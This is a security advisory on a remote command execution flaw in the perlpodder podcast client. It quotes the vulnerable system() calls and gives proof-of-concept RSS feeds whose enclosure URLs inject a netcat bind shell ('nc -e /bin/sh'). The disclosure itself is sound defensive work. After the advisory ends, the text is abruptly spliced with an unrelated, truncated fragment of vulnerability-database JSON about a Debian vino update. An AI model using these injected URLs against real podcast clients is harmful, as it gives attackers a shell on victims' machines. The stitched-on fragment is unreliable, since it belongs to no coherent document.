Advisory: Perlpodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in perlpodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.
Details
Product: perlpodder
Affected Versions: All versions up to perlpodder-0.4
Fixed Versions: perlpodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://perlpodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
Perlpodder is a podcatcher script written in perl. It automates
downloading podcasts.
(from perlpodder SourceForge page)
Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.
More Details

When perlpodder fetches a podcast, it extracts the URL of the audio file
from the XML feed the server provides and stores it in the variable
"$dlset". This variable is then spliced into a command string that is
passed to system() in two places. Because system() receives a single
string rather than a list of arguments, Perl hands that string to
/bin/sh for parsing, so any shell metacharacters contained in the URL
are interpreted by the shell:
The first usage is with "echo" to log the URL (line 278):
[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]
The second usage is with "wget" to actually fetch the audio file (line
294):

[...]
291 # Prepair to call wget
292
293 $wget_path = "$cwd". "$datadir" ;
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2
        --timeout=20 --random-wait " . $dlset . " -P ".
        $wget_path ;
295
296 if ($DEBUG > 0) {
297
298 print "running " . $wget_cmd . "\n" ;
299
300 }
301
302 system $wget_cmd;
[...]
Unfortunately, $dlset is never sanitized, so a remote server can embed
arbitrary shell commands in the URL, and they are executed by the
system() calls at lines 279 and 302.
Proof of Concept
A minimal malicious RSS feed from the server which exploits the "echo"
call may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
 <title>RedTeam Pentesting Example Malicious Server Feed</title>

 <item>
 <enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l -p 1337 &amp;#"
 length="241734" type="audio/mpeg" />
 </item>
</channel>
</rss>
Once line 278 has spliced this URL into the command string, /bin/sh is
handed the following (with $log_path already interpolated by Perl):

echo http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l -p 1337 &# >> $log_path

The redirection discards the output of echo, ";" ends the echo command,
netcat then listens on port 1337 and attaches /bin/sh to whoever
connects, "&" puts netcat in the background so that perlpodder keeps
running, and "#" turns the trailing " >> $log_path" into a comment.
("&amp;" is simply the XML encoding of "&"; the "-e" option needs a
netcat build that supports it.) This is just one example of how to
exploit the vulnerability, as arbitrary commands can be included in the
URL, but it should illustrate the point.
To exploit the "wget" call, the URL just has to be minimally adjusted;
here the "#" comments out the " -P $wget_path" that follows the URL at
line 294:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
 <title>RedTeam Pentesting</title>

 <item>
 <enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l -p 1337 &amp;#"
 length="241734" type="audio/mpeg" />
 </item>
</channel>
</rss>
Workaround

Do not use perlpodder with untrusted servers.

Fix

Upgrade to perlpodder-0.5 immediately (download:
http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download).

Security Risk

High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of perlpodder (normally the user's
privileges).
History
2006-05-19 Discovery of the problem
2006-05-19 Notification of the author
2006-05-21 Fixed version of perlpodder is released
2006-05-22 Email from author pointing out the release
2006-05-22 Public release of the advisory without CVE
           number because of public release by the
           author. CVE will be appended when available.
RedTeam

RedTeam Pentesting offers individual penetration tests (pentests),
performed by a team of specialised IT-security experts. In this way,
security weaknesses in company networks are uncovered and can be
repaired immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance public knowledge through research in security
related areas. The results are made available as public security
advisories.
More information about RedTeam can be found at
http://www.redteam-pentesting.de.
source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. 
This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. 
The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. 
This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}